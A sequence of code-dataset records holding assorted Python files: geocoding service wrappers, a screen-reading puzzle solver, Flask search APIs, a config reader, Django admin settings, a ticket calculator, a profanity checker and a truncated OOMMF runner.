dict(location, **{kw: kwargs[kw]})\n return location\n if pq.address.strip() != '':\n location = {}\n location = get_appended_location(location, street=pq.query)\n if location == {}:\n location = get_appended_location(location, street=pq.address)\n location = get_appended_location(location, city=pq.city, county=pq.subregion, state=pq.state,\n postalCode=pq.postal, country=pq.country)\n json_ = dict(location=location)\n json_ = json.dumps(json_)\n query = dict(key=unquote(self._settings['api_key']),\n json=json_)\n else:\n query = dict(key=unquote(self._settings['api_key']),\n location=pq.query)\n if pq.viewbox is not None:\n query = dict(query, viewbox=pq.viewbox.to_mapquest_str())\n response_obj = self._get_json_obj(self._endpoint, query)\n returned_candidates = [] # this will be the list returned\n for r in response_obj['results'][0]['locations']:\n c = Candidate()\n c.locator = r['geocodeQuality']\n c.confidence = r['geocodeQualityCode'] # http://www.mapquestapi.com/geocoding/geocodequality.html\n match_addr_elements = ['street', 'adminArea5', 'adminArea3',\n 'adminArea2', 'postalCode'] # similar to ESRI\n c.match_addr = ', '.join([r[k] for k in match_addr_elements if k in r])\n c.x = r['latLng']['lng']\n c.y = r['latLng']['lat']\n c.wkid = 4326\n c.geoservice = self.__class__.__name__\n returned_candidates.append(c)\n return returned_candidates\n\n\nclass MapQuestSSL(MapQuest):\n _endpoint = 'https://www.mapquestapi.com/geocoding/v1/address'\n\nclass MapQuestOpen(MapQuest):\n _endpoint = 'http://open.mapquestapi.com/geocoding/v1/address'\n\nclass Nominatim(GeocodeService):\n \"\"\"\n Class to geocode using Nominatim services hosted\n by MapQuest.\n \"\"\"\n _wkid = 4326\n _endpoint = 'http://open.mapquestapi.com/nominatim/v1/search'\n\n DEFAULT_ACCEPTED_ENTITIES = ['building.', 'historic.castle', 'leisure.ice_rink',\n 'leisure.miniature_golf',\n 'leisure.sports_centre', 'leisure.stadium', 'leisure.track',\n 'leisure.water_park', 'man_made.lighthouse', 'man_made.works',\n 'military.barracks', 'military.bunker', 'office.', 
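# Editor's worked example for the USCensus street-address reconstruction
# above: the leading house number is pulled off matchedAddress with a regex,
# then the ordered address components are joined. Field values are invented
# for illustration.
import re

match = {
    'matchedAddress': '1600 N MAIN ST, ANYTOWN, PA, 19000',
    'addressComponents': {'preDirection': 'N', 'streetName': 'MAIN',
                          'suffixType': 'ST'},
}
addr_num_re = re.match(r'([0-9]+)', match['matchedAddress'])
parts = [addr_num_re.group(0)] + [
    match['addressComponents'].get(f, '')
    for f in ['preQualifier', 'preDirection', 'preType', 'streetName',
              'suffixType', 'suffixDirection', 'suffixQualifier']]
assert ' '.join(s for s in parts if s) == '1600 N MAIN ST'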
'place.house',\n 'amenity.', 'power.generator', 'railway.station',\n 'shop.', 'tourism.']\n\n DEFAULT_REJECTED_ENTITIES = ['amenity.drinking_water',\n 'amenity.bicycle_parking', 'amenity.ev_charging',\n 'amenity.grit_bin', 'amenity.atm',\n 'amenity.hunting_stand', 'amenity.post_box']\n\n DEFAULT_PREPROCESSORS = [ReplaceRangeWithNumber()] # 766-68 Any St. -> 766 Any St.\n \"\"\"Preprocessors to use with this geocoder service, in order of desired execution.\"\"\"\n\n DEFAULT_POSTPROCESSORS = [\n AttrFilter(DEFAULT_ACCEPTED_ENTITIES, 'entity', exact_match=False),\n AttrExclude(DEFAULT_REJECTED_ENTITIES, 'entity')\n ]\n \"\"\"Postprocessors to use with this geocoder service, in order of desired execution.\"\"\"\n\n def __init__(self, preprocessors=None, postprocessors=None, settings=None):\n preprocessors = Nominatim.DEFAULT_PREPROCESSORS if preprocessors is None else preprocessors\n postprocessors = Nominatim.DEFAULT_POSTPROCESSORS if postprocessors is None else postprocessors\n GeocodeService.__init__(self, preprocessors, postprocessors, settings)\n\n def _geocode(self, pq):\n query = {'q':pq.query,\n 'countrycodes':pq.country, # only takes ISO-2\n 'format':'json'}\n\n if pq.viewbox is not None:\n query = dict(query, **{'viewbox':pq.viewbox.to_mapquest_str(), 'bounded':pq.bounded})\n\n response_obj = self._get_json_obj(self._endpoint, query)\n\n returned_candidates = [] # this will be the list returned\n for r in response_obj:\n c = Candidate()\n c.locator = 'parcel' # we don't have one but this is the closest match\n c.entity = '%s.%s' % (r['class'], r['type']) # ex.: \"place.house\"\n c.match_addr = r['display_name'] # ex. \"Wolf Building, 340, N 12th St, Philadelphia, Philadelphia County, Pennsylvania, 19107, United States of America\" #TODO: shorten w/ pieces\n c.x = float(r['lon']) # long, ex. -122.13 # cast to float in 1.3.4\n c.y = float(r['lat']) # lat, ex. 
47.64 # cast to float in 1.3.4\n c.wkid = self._wkid\n c.geoservice = self.__class__.__name__\n returned_candidates.append(c)\n return returned_candidates\n","sub_path":"omgeo/services/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"328740250","text":"\nimport pyscreenshot # grab()\nimport math # infinity\n\nfrom enums import Color, Direction, MapObject\nfrom mouse import mouseDrag, setMouseCoords\nimport screenshot\n\n# Board width/height in number of blocks\n_BOARD_WIDTH_BLOCK = 6\n_BOARD_HEIGHT_BLOCK = 6\n\n# RGB\n_COLOR_RED = (221, 34, 0)\n_COLOR_GREEN = (34, 204, 0)\n_COLOR_DARKBLUE = (34, 34, 221)\n_COLOR_LIGHTBLUE = (0, 221, 221)\n_COLOR_YELLOW = (238, 238, 0)\n_COLOR_PURPLE = (170, 0, 170)\n\nclass Game():\n\n def __init__(self):\n self.gameboard = []\n self.unconnectedColors = [Color.red, Color.green, Color.darkblue, Color.lightblue, Color.yellow, Color.purple]\n self.xPadding = 0\n self.yPadding = 0\n self.width = 0\n self.height = 0\n self.blocksize = 0\n # self.unconnectedColors = [Color.green]\n\n # Assumes game window is in the foreground\n # A gameboard position consist of a dictionary with information about\n # object on that position such as color, type, parent x and ycoords and distance\n # where the last three are used in findPath (Dijkstras)\n def createGameboard(self):\n\n fullscreenImage=pyscreenshot.grab()\n x1 = screenshot.getLeftside(fullscreenImage)\n y1 = screenshot.getTop(fullscreenImage)\n x2 = screenshot.getRightside(fullscreenImage)\n y2 = screenshot.getBottom(fullscreenImage)\n gameboardImage=pyscreenshot.grab(bbox=(x1,y1,x2,y2))\n self.xPadding = x1\n self.yPadding = y1\n self.width = x2-x1\n self.height = y2-y1\n self.blocksize = self.width/_BOARD_WIDTH_BLOCK\n self.gameboard = [[0 for x in range(_BOARD_WIDTH_BLOCK)] for y in range(_BOARD_HEIGHT_BLOCK)]\n for y in range(_BOARD_HEIGHT_BLOCK):\n for x in range(_BOARD_WIDTH_BLOCK):\n # Magic number five is offset to ensure a blob is sampled correctly, remove it and in some cases a blob is missed\n magicNum = 10\n color = gameboardImage.getpixel((self.blocksize/2+x*self.blocksize, self.blocksize/2+y*self.blocksize+magicNum))\n if(color == _COLOR_RED):\n self.gameboard[y][x] = {'color': Color.red, 'objectType': MapObject.blob, 'coords': (x,y) ,'parentX': None, 'parentY': None, 'distance':-1}\n elif(color == _COLOR_GREEN):\n self.gameboard[y][x] = {'color': Color.green, 'objectType': MapObject.blob, 'coords': (x,y) ,'parentX': None, 'parentY': None, 'distance':-1}\n elif(color == _COLOR_DARKBLUE):\n self.gameboard[y][x] = {'color': Color.darkblue, 'objectType': MapObject.blob, 'coords': (x,y) ,'parentX': None, 'parentY': None, 'distance':-1}\n elif(color == _COLOR_LIGHTBLUE):\n self.gameboard[y][x] = {'color': Color.lightblue, 'objectType': MapObject.blob, 'coords': (x,y) ,'parentX': None, 'parentY': None, 'distance':-1}\n elif(color == _COLOR_YELLOW):\n self.gameboard[y][x] = {'color': Color.yellow, 'objectType': MapObject.blob, 'coords': (x,y) ,'parentX': None, 'parentY': None, 'distance':-1}\n elif(color == _COLOR_PURPLE):\n self.gameboard[y][x] = {'color': Color.purple, 'objectType': MapObject.blob, 'coords': (x,y) ,'parentX': None, 'parentY': None, 'distance':-1}\n else:\n self.gameboard[y][x] = {'color': Color.colorless, 'objectType': MapObject.empty, 'coords': (x,y) ,'parentX': None, 'parentY': None, 'distance':-1}\n\n def printBoard(self):\n for y in 
range(_BOARD_HEIGHT_BLOCK):\n for x in range(_BOARD_WIDTH_BLOCK):\n print(self.gameboard[y][x]['color'].name, end=\" \")\n print()\n\n # Resets all paths of a certain color\n def clearColor(self, color):\n for y in range(_BOARD_HEIGHT_BLOCK):\n for x in range(_BOARD_WIDTH_BLOCK):\n if self.gameboard[y][x]['color'] == color and self.gameboard[y][x]['objectType'] == MapObject.path:\n self.gameboard[y][x]['color'] = Color.colorless\n self.gameboard[y][x]['objectType'] = MapObject.empty\n\n # Dijkstra's shortest path, breadth-first style\n # Finds shortest path from (startX,startY) to the nearest blob of the same color\n # Returns stack where the start pos is at the top and the goal at the bottom\n # NB: this works on the gameboard in place, via references to its mutable cell dicts\n def findPath(self,startX,startY,ignorePaths):\n # Reset all nodes in the gameboard\n for y in range(_BOARD_HEIGHT_BLOCK):\n for x in range(_BOARD_WIDTH_BLOCK):\n self.gameboard[y][x]['parentX'] = None\n self.gameboard[y][x]['parentY'] = None\n self.gameboard[y][x]['distance'] = math.inf\n\n # Init start node\n color = self.gameboard[startY][startX]['color']\n self.gameboard[startY][startX]['distance'] = 0\n # List of nodes that have not been visited\n unvisited = [self.gameboard[startY][startX]]\n\n while unvisited:\n unvisited.sort(key=lambda dictEntry: dictEntry['distance']) # Sort by the 'distance' key\n current = unvisited.pop(0)\n x = current['coords'][0]\n y = current['coords'][1]\n dist = current['distance']\n\n # If the goal is found, stop looking\n if (not(x == startX) or not(y == startY)) and current['color'] == color and current['objectType'] == MapObject.blob:\n break\n\n # Update up\n tmpX = x\n tmpY = y-1\n if tmpY>=0 and self.gameboard[tmpY][tmpX]['distance'] > dist+1:\n if self.gameboard[tmpY][tmpX]['objectType'] == MapObject.empty or self.gameboard[tmpY][tmpX]['color'] == color or (ignorePaths and self.gameboard[tmpY][tmpX]['objectType'] == MapObject.path):\n self.gameboard[tmpY][tmpX]['parentX'] = x\n self.gameboard[tmpY][tmpX]['parentY'] = y\n self.gameboard[tmpY][tmpX]['distance'] = dist+1\n unvisited.append(self.gameboard[tmpY][tmpX])\n\n # right\n tmpX = x+1\n tmpY = y\n if tmpX<_BOARD_WIDTH_BLOCK and self.gameboard[tmpY][tmpX]['distance'] > dist+1:\n if self.gameboard[tmpY][tmpX]['objectType'] == MapObject.empty or self.gameboard[tmpY][tmpX]['color'] == color or (ignorePaths and self.gameboard[tmpY][tmpX]['objectType'] == MapObject.path):\n self.gameboard[tmpY][tmpX]['parentX'] = x\n self.gameboard[tmpY][tmpX]['parentY'] = y\n self.gameboard[tmpY][tmpX]['distance'] = dist+1\n unvisited.append(self.gameboard[tmpY][tmpX])\n\n # down\n tmpX = x\n tmpY = y+1\n if tmpY<_BOARD_HEIGHT_BLOCK and self.gameboard[tmpY][tmpX]['distance'] > dist+1:\n if self.gameboard[tmpY][tmpX]['objectType'] == MapObject.empty or self.gameboard[tmpY][tmpX]['color'] == color or (ignorePaths and self.gameboard[tmpY][tmpX]['objectType'] == MapObject.path):\n self.gameboard[tmpY][tmpX]['parentX'] = x\n self.gameboard[tmpY][tmpX]['parentY'] = y\n self.gameboard[tmpY][tmpX]['distance'] = dist+1\n unvisited.append(self.gameboard[tmpY][tmpX])\n\n # left\n tmpX = x-1\n tmpY = y\n if tmpX>=0 and self.gameboard[tmpY][tmpX]['distance'] > dist+1:\n if self.gameboard[tmpY][tmpX]['objectType'] == MapObject.empty or self.gameboard[tmpY][tmpX]['color'] == color or (ignorePaths and self.gameboard[tmpY][tmpX]['objectType'] == MapObject.path):\n self.gameboard[tmpY][tmpX]['parentX'] = x\n self.gameboard[tmpY][tmpX]['parentY'] = y\n 
self.gameboard[tmpY][tmpX]['distance'] = dist+1\n unvisited.append(self.gameboard[tmpY][tmpX])\n\n # When goal has been reached unravel path by adding current positions coords to the stack\n # then set current pos to parent and repeat until start positions is reached\n pathStack = []\n coordTuple = current['coords']\n pathStack.append(coordTuple)\n while not(coordTuple==self.gameboard[startY][startX]['coords']):\n current = self.gameboard[current['parentY']][current['parentX']]\n coordTuple = current['coords']\n pathStack.append(coordTuple)\n # If cross over another colors then add that color to unconnectedColors\n if not(current['color'] == Color.colorless) and current['color'] not in self.unconnectedColors:\n self.unconnectedColors.append(current['color'])\n self.clearColor(current['color'])\n\n # print(pathStack)\n return pathStack\n\n # Takes a stack of coordinates and drags the cursor from the coords at the top of the stack to the bottom\n def connectPath(self, pathStack):\n\n # debug\n import time\n time.sleep(0.1)\n\n currPos = pathStack.pop()\n currColor = self.gameboard[currPos[1]][currPos[0]]['color']\n setMouseCoords(self.xPadding+int(self.blocksize/2)+currPos[0]*self.blocksize, self.yPadding+int(self.blocksize/2)+currPos[1]*self.blocksize)\n prevPos = currPos\n while pathStack:\n currPos = pathStack.pop()\n # Mark new positions as a path\n self.gameboard[currPos[1]][currPos[0]]['color'] = currColor\n # Dont change to path if goal position since it is and must remain a blob\n if pathStack:\n self.gameboard[currPos[1]][currPos[0]]['objectType'] = MapObject.path\n\n if currPos[1]==prevPos[1]-1:#up\n mouseDrag(Direction.up,self.blocksize)\n elif currPos[0]==prevPos[0]+1: #right\n mouseDrag(Direction.right,self.blocksize)\n elif currPos[1]==prevPos[1]+1:#down\n mouseDrag(Direction.down,self.blocksize)\n elif currPos[0]==prevPos[0]-1:#left\n mouseDrag(Direction.left,self.blocksize)\n prevPos = currPos\n\n # Goes through the gameboard and finds one path between every pair of blobs\n def connectGameboard(self):\n # List of already finished colors\n # uncompletedColors = [Color.red, Color.green, Color.darkblue, Color.lightblue, Color.yellow, Color.purple]\n tries = 3\n prevUnconnectedColors = []\n while not(self.unconnectedColors==prevUnconnectedColors) and tries>0:\n prevUnconnectedColors = list(self.unconnectedColors)\n tries-=1\n for y in range(_BOARD_HEIGHT_BLOCK):\n for x in range(_BOARD_WIDTH_BLOCK):\n if self.gameboard[y][x]['objectType'] == MapObject.blob and self.gameboard[y][x]['color'] in self.unconnectedColors:\n path = self.findPath(x,y,False)\n # If the path is only the start pos (len 1) or if the goal pos is not a blob\n if(len(path) <= 1 or not(self.gameboard[path[0][1]][path[0][0]]['objectType'] == MapObject.blob)):\n # print(\"disregarding: \",self.gameboard[y][x]['color'],\" goal: \",self.gameboard[path[0][1]][path[0][0]])\n path = self.findPath(x,y,True)\n # print(\"connecting: \",self.gameboard[y][x]['color'],\" goal: \",self.gameboard[path[0][1]][path[0][0]])\n self.connectPath(path)\n self.unconnectedColors.remove(self.gameboard[y][x]['color'])\n # print(self.unconnectedColors, prevUnconnectedColors)\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":11677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"426617806","text":"class Solution:\n \"\"\"\n @param str: a string containing uppercase alphabets and integer digits\n @return: the alphabets in the order followed by the sum of 
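# Editor's sketch: the four copy-pasted neighbour updates in findPath above
# (up/right/down/left) can be collapsed into one relaxation loop over
# offsets. A refactoring suggestion under the same cell-dict layout, not the
# original author's code; MapObject is passed in to keep the sketch
# self-contained.
_OFFSETS = [(0, -1), (1, 0), (0, 1), (-1, 0)]  # up, right, down, left

def relax_neighbours(board, x, y, dist, color, ignore_paths, unvisited,
                     width, height, MapObject):
    for dx, dy in _OFFSETS:
        nx, ny = x + dx, y + dy
        if not (0 <= nx < width and 0 <= ny < height):
            continue  # off the board
        cell = board[ny][nx]
        passable = (cell['objectType'] == MapObject.empty
                    or cell['color'] == color
                    or (ignore_paths and cell['objectType'] == MapObject.path))
        if passable and cell['distance'] > dist + 1:
            cell['parentX'], cell['parentY'] = x, y
            cell['distance'] = dist + 1
            unvisited.append(cell)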
digits\n \"\"\"\n def rearrange(self, string):\n # Write your code here\n if not string:\n return \"\"\n result = \"\"\n sum = 0\n for i in range(len(string)):\n if string[i].isalpha():\n result += string[i]\n else:\n sum += int(string[i])\n result = sorted(result)\n \n ans = \"\".join(result) + str(sum)\n return ans","sub_path":"python/2019/rerangeStringWithInteger.py","file_name":"rerangeStringWithInteger.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"627847142","text":"from flask import Blueprint, request, make_response, jsonify\nfrom flask.views import MethodView\nfrom flask_cors import cross_origin\nfrom app.database.models import Line, Translation, Content\nfrom app import app, db\nfrom flask_sqlalchemy import get_debug_queries\nfrom sqlalchemy.orm import joinedload\nfrom sqlalchemy import asc, desc, func\nfrom flask_cors import CORS\n\nsearch_blueprint = Blueprint('search', __name__)\nCORS(search_blueprint)\n\nclass SearchLineAPI(MethodView):\n \"\"\"\n Line Search Resource\n \"\"\"\n \n def get(self):\n\n keyword = request.args.get('keyword', '', type=str)\n page = request.args.get('page', 1, type=int)\n\n if len(keyword) <= 1:\n res_obj = {'message': 'There must be at least two characters.'}\n return make_response(jsonify(res_obj)), 400\n\n # ~: regexp in postgres\n # ~*: regexp ignorecase in postgres\n keyword = r'(^|[\\s])' + keyword + r'([\\s?!\\.,]|$)'\n line_count = db.session.query(func.count(Line.id)).filter(\n Line.line.op('~*')(keyword)).scalar()\n lines = Line.query.options(joinedload(Line.content, innerjoin=True)\n .joinedload(Content.category, innerjoin=True))\\\n .options(joinedload(Line.content, innerjoin=True)\n .joinedload(Content.genres))\\\n .filter(Line.line.op('~*')(keyword)).paginate(\n page, app.config['LINE_PER_PAGE'], False)\n res = []\n \n for line in lines.items:\n content = line.content\n genres = [genre.genre for genre in content.genres]\n\n content_dict = {\n 'title': content.title,\n 'category': content.category.category,\n 'genres': genres,\n 'reference': content.reference\n }\n res.append({\n 'id': line.id,\n 'time': str(line.time),\n 'line': line.line,\n 'content': content_dict\n\n })\n\n res_obj = {'count': line_count, 'lines': res}\n\n return make_response(jsonify(res_obj)), 200\n\n\nclass LineDetailAPI(MethodView):\n \"\"\"\n Line Detail Resource\n \"\"\"\n\n def get(self, line_id):\n\n lines_until_target_line = Line.query.options(joinedload(Line.content, innerjoin=True)\n .joinedload(Content.genres, innerjoin=True))\\\n .options(joinedload(Line.content, innerjoin=True)\n .joinedload(Content.category, innerjoin=True))\\\n .filter(Line.id <= line_id).order_by(desc(Line.id)).limit(5).all()\n\n lines_until_target_line = list(reversed(lines_until_target_line))\n\n try:\n line = lines_until_target_line[-1]\n except IndexError:\n res_obj = {'message': 'There is no matched line!'}\n return make_response(jsonify(res_obj)), 400\n\n target_line = {\n 'time': str(line.time),\n 'id': line.id,\n 'line': line.line\n }\n\n \n content = {\n 'id': line.content.id,\n 'title': line.content.title,\n 'category': line.content.category.category,\n 'genres': [genre.genre for genre in line.content.genres],\n 'reference': line.content.reference\n }\n\n if target_line['id'] != line_id:\n res_obj = {'message': 'There is no matched line!'}\n return make_response(jsonify(res_obj)), 400\n\n lines_after_target_line = Line.query.options(joinedload(Line.content, 
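# Editor's example: the whole-word pattern built in SearchLineAPI above,
# checked here with Python's re module as a stand-in for Postgres ~*
# (the semantics are close enough for illustration).
import re

pattern = r'(^|[\s])' + 'love' + r'([\s?!\.,]|$)'
assert re.search(pattern, 'I love you.', re.IGNORECASE)
assert re.search(pattern, 'Love, actually', re.IGNORECASE)
assert not re.search(pattern, 'glove story', re.IGNORECASE)  # no mid-word hits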
innerjoin=True))\\\n .filter(Line.id > line_id).order_by(asc(Line.id)).limit(5).all()\n lines = lines_until_target_line + lines_after_target_line\n\n res = []\n\n for line in lines:\n if line.content.title == content['title']:\n res.append({\n 'time': str(line.time),\n 'id': line.id,\n 'line': line.line\n })\n\n return make_response(jsonify({'content': content, 'target_line': target_line, 'lines': res})), 200\n\n\nclass SearchTranslationAPI(MethodView):\n \"\"\"\n Translation Search Resource\n \"\"\"\n\n def get(self):\n\n keyword = request.args.get('keyword', '', type=str)\n page = request.args.get('page', 1, type=int)\n\n if len(keyword) <= 1:\n res_obj = {'message': 'There must be at least two characters.'}\n return make_response(jsonify(res_obj)), 400\n\n keyword = r'(^|[\s])' + keyword + r'([\s?!\.,]|$)'\n translation_count = db.session.query(func.count(func.distinct(Line.id))).join(Translation).filter(\n Translation.translation.op('~')(keyword)).scalar()\n\n translations = Translation.query.options(joinedload('line', innerjoin=True)\n .joinedload(Line.content)\n .joinedload(Content.category))\\\n .options(joinedload(Translation.content, innerjoin=True)\n .joinedload(Content.genres))\\\n .filter(Translation.translation.op('~')(keyword)).paginate(\n page, app.config['LINE_PER_PAGE'], False)\n\n res = []\n for translation in translations.items:\n line = translation.line\n content = translation.content\n genres = [genre.genre for genre in content.genres]\n content_dict = {\n 'content_id': content.id,\n 'title': content.title,\n 'category': content.category.category,\n 'genres': genres,\n 'reference': content.reference\n }\n res.append({\n 'id':translation.id,\n 'translation': translation.translation,\n 'line_id': line.id,\n 'line': line.line,\n 'content': content_dict\n })\n\n res_obj = {'count': translation_count, 'translations': res}\n return make_response(jsonify(res_obj)), 200\n\n\n# define the API resources\nsearch_line_view = SearchLineAPI.as_view('search_line_api')\nsearch_line_detail_view = LineDetailAPI.as_view('search_detail_api')\nsearch_translation_view = SearchTranslationAPI.as_view('search_translation_api')\n\n# add Rules for API Endpoints\nsearch_blueprint.add_url_rule(\n '/search/lines',\n view_func=search_line_view,\n methods=['GET']\n)\n\nsearch_blueprint.add_url_rule(\n '/search/line_detail/<int:line_id>',\n view_func=search_line_detail_view,\n methods=['GET']\n)\n\nsearch_blueprint.add_url_rule(\n '/search/translations',\n view_func=search_translation_view,\n methods=['GET']\n)\n","sub_path":"backend/app/router/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":6558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"319632026","text":"import os,sys,configparser\nfrom log.logger import RecordLogging\nDIR_PATH=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(DIR_PATH)\nconf_file=\"%s\\\\dataconfig\\\\config.ini\"%DIR_PATH\n\nclass GetConfigValue(object):\n '''Wraps reading data from an ini-format config file'''\n def __init__(self,filepath=None):\n if filepath!=None:\n self.filepath=filepath\n else:\n self.filepath=conf_file\n self.global_data=self.get_config_obj() # global config data\n self.log=RecordLogging()\n # Object for reading the config file\n def get_config_obj(self,):\n conf=configparser.ConfigParser()\n conf.read(self.filepath)\n return conf\n\n # Read all section names of the config file\n def get_section_value(self):\n section_value=self.global_data.sections()\n return section_value\n\n # Get the option names under the given section\n def 
get_from_section_optval(self,section_name):\n option_value=self.global_data.options(section_name)\n return option_value\n\n # Get the key/value pairs under the given section\n def get_item_value(self,section_name):\n item_value=dict(self.global_data.items(section_name))\n return item_value\n\n # Get the given option value under the given section\n def get_value(self,section_name,option_name):\n try:\n get_value=self.global_data.get(section_name,option_name)\n except Exception as e:\n self.log.logger.error(e)\n # self.log.logger.exception(e)\n else:\n return get_value\n\n # Write data into the config file\n def write_conf_data(self,add_sec,sec_key,sec_value):\n '''Add a new section add_sec, with the given key and value under that section'''\n sections = self.get_section_value() # get all section names in the config file\n if add_sec not in sections:\n self.global_data.add_section(add_sec) # add a new section\n self.global_data.set(add_sec,sec_key,sec_value) # set the key/value under the section\n else:\n print(\"The config file already contains this section name!\")\n with open(conf_file,'w') as f:\n self.global_data.write(f) # write the data to the config file\n\n # Update a value in the config file\n def update_conf_data(self,sec_name,sec_key,sec_value):\n sections_list = self.get_section_value() # get all section names in the config file\n if sec_name in sections_list:\n self.global_data.set(sec_name,sec_key,sec_value)\n else:\n print(\"The config file does not contain this section name!\")\n with open(conf_file,\"w\") as f:\n self.global_data.write(f)\n\n\nif __name__==\"__main__\":\n conf=GetConfigValue()\n print(conf.update_conf_data('header','token','127.0.0.1'))\n\n\n","sub_path":"api_requests/data/getConfigdata.py","file_name":"getConfigdata.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"88835719","text":"from django.contrib import admin\nfrom .models import Category, Contact\n\nclass ContactAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'name',\n 'last_name',\n 'phone',\n 'email',\n 'creation_date',\n 'category',\n 'show'\n )\n\n list_display_links = (\n 'id',\n 'name',\n 'last_name'\n )\n\n list_filter = (\n 'name',\n 'last_name'\n )\n\n search_fields = (\n 'name',\n 'last_name',\n 'phone'\n )\n\n list_editable = (\n 'phone',\n 'show'\n )\n\n list_per_page = 10\n\nclass CategoryAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'name'\n )\n\n list_display_links = (\n 'id',\n 'name'\n )\n\n search_fields = (\n 'name',\n )\n\n list_per_page = 10\n\nadmin.site.register(Category, CategoryAdmin)\nadmin.site.register(Contact, ContactAdmin)\n","sub_path":"my_contacts/contacts/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"134391123","text":"\"\"\"\nThis module is an implementation of a movie ticket system.\nIt collects the quantity of movie tickets needed.\n\nAuthor: Yok Yen\nDate: 7 Sept 2016\nVersion: 1.0\n\"\"\"\n\nADULT_TICKET_PRICE = 10\nCHILD_TICKET_PRICE = 5\nCONC_TICKET_PRICE = 8\nPREMIUM_FACTOR = 2\nEXTRAVAGANT_FACTOR = 5\nLUCKYNUM = 2\n\ndef getQuantity(prompt):\n \"\"\" This function gets the quantity based on the prompt,\n re-prompting until a non-negative value is entered.\n :param prompt: The message to display to user\n :return: The quantity user entered.\n \"\"\"\n value = int(input(prompt + \"\\n>>>\"))\n while value < 0: # While loop to display error message when the quantity is below 0\n print(\"Error in input.\")\n value = int(input(prompt + \"\\n>>>\"))\n return value\n\ndef calcTotalCost(packageCode, numAdultTickets, 
numChildTickets, numConcTickets):\n adultCost = numAdultTickets * ADULT_TICKET_PRICE\n childCost = numChildTickets * CHILD_TICKET_PRICE\n concCost = numConcTickets * CONC_TICKET_PRICE\n totalCost = adultCost + childCost + concCost\n if packageCode == 'P':\n totalCost = totalCost * PREMIUM_FACTOR\n elif packageCode == 'E':\n totalCost = totalCost * EXTRAVAGANT_FACTOR\n return totalCost\n\ndef getDiscount():\n import random\n rand_num = random.randint(1, 10)\n\n if rand_num == LUCKYNUM:\n discount = True\n else:\n discount = False\n return discount\n\ndef main():\n package = input(\"Welcome \\n Enter your choice(B, P, E):\").upper()\n\n while package not in ['B', 'P', 'E']:\n print(\"Error\")\n package = input(\"Welcome \\n Enter your choice(B, P, E):\").upper()\n\n adultTickets = getQuantity(\"How many adult tickets? \")\n childTickets = getQuantity(\"How many child tickets? \")\n concTickets = getQuantity(\"How many concession tickets? \")\n ticketCost = calcTotalCost(package, adultTickets, childTickets, concTickets)\n discounted = False\n if ticketCost > 100:\n discounted = getDiscount()\n if discounted:\n ticketCost = ticketCost * 0.8\n print(\"You received a 20% discount\")\n print(\"Final cost: \", ticketCost)\nmain()","sub_path":"week8_sample_answer.py","file_name":"week8_sample_answer.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"272959473","text":"import urllib\n\ndef movie_quotes():\n quotes = open(\"movie_quotes.txt\").read()\n check_profanity(quotes)\n\ndef read_text():\n quote = raw_input(\"Please enter some text. Let's see if you're a naughty one...\\n\")\n check_profanity(quote)\n\ndef check_profanity(text_to_check):\n connection = urllib.urlopen(\"http://www.wdylike.appspot.com/?q=\"+text_to_check)\n output = connection.read()\n if output == \"false\":\n print (\"ALL GOOD! NO SWEAR WORDS!!! PATPAT\")\n elif output == \"true\":\n print (\"SWEAR WORDS!!! 
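# Editor's worked example for calcTotalCost in week8_sample_answer.py above,
# using the module's own constants: 2 adults + 1 child on package 'P'.
#   base cost = 2*10 + 1*5 + 0*8 = 25
#   premium doubles it: 25 * PREMIUM_FACTOR (2) = 50
assert calcTotalCost('P', 2, 1, 0) == 50
assert calcTotalCost('B', 2, 1, 0) == 25  # basic package: no multiplier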
YOU'RE A NAUGHTY ONE!!!!!\")\n else:\n print (\"Could not scan the document properly.\")\n connection.close()\n\n#movie_quotes()\nread_text()\n","sub_path":"Swear_Alarm/swear_detector.py","file_name":"swear_detector.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"189964247","text":"import os\nimport sys\nimport sarge\n\n\nclass OOMMF:\n def __init__(self, varname=\"OOMMFTCL\", dockername=\"docker\",\n dockerimage=\"joommf/oommf\", where=None):\n self.varname = varname\n self.dockername = dockername\n self.dockerimage = dockerimage\n self.statusdict = self.status(raise_exception=False)\n self.where = self._where_to_run(where)\n\n def status(self, raise_exception=False, verbose=False):\n # OOMMF status on host\n cmd = (\"tclsh\", os.getenv(self.varname, \"wrong\"), \"boxsi\",\n \"+fg\", \"+version\", \"-exitondone\", \"1\")\n try:\n poommf = self._run_cmd(cmd)\n returncode = poommf.returncode\n except FileNotFoundError:\n returncode = 1\n if returncode:\n host = False\n if verbose:\n oommfpath = os.getenv(self.varname)\n if oommfpath is None:\n print(\"Cannot find {} path.\".format(self.varname))\n elif not os.path.isfile(oommfpath):\n print(\"{} path {} set to a non-existing \"\n \"file.\".format(self.varname, oommfpath))\n else:\n print(\"{} path {} set to an existing \"\n \"file.\".format(self.varname, oommfpath))\n print(\"Something wrong with OOMMF installation.\")\n else:\n host = True\n\n # Docker status\n cmd = (self.dockername, \"images\")\n try:\n pdocker = self._run_cmd(cmd)\n returncode = pdocker.returncode\n except FileNotFoundError:\n returncode = 1\n\n if returncode:\n docker = False\n if verbose:\n print(\"Docker not installed/active.\")\n else:\n docker = True\n\n # Raise exception if required\n if not (host or docker) and raise_exception:\n raise EnvironmentError(\"OOMMF and docker not found.\")\n\n return {\"host\": 